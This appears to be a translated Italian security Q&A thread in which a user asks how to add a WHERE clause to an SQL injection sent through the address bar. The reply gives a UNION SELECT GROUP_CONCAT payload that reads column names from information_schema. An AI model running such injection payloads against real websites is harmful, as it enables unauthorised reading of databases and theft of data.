iniezione SQL: utilizzare l'istruzione WHERE nella barra degli indirizzi

Naviga le tue risposte
3


Come posso usare l'istruzione "Dove" durante un attacco di sql-injection nella barra degli indirizzi?
ad esempio: 

... from+information_schema.TABLES+where+TABLE_SCHEMA+=+XXXX--

Il codice sopra non funziona.

    
posta Siamak A.Motlagh 08.10.2012 - 12:35
fonte

1 risposta

3

Puoi recuperare le colonne per una tabella specifica con questa richiesta: 

UNION SELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name = 'tablename'

Fonte: link

    
risposta data 08.10.2012 - 13:18
fonte

Leggi altre domande sui tag

Configurazione per account Windows mappato all'autorizzazione del certificato IIS Monitoraggio per minacce alla sicurezza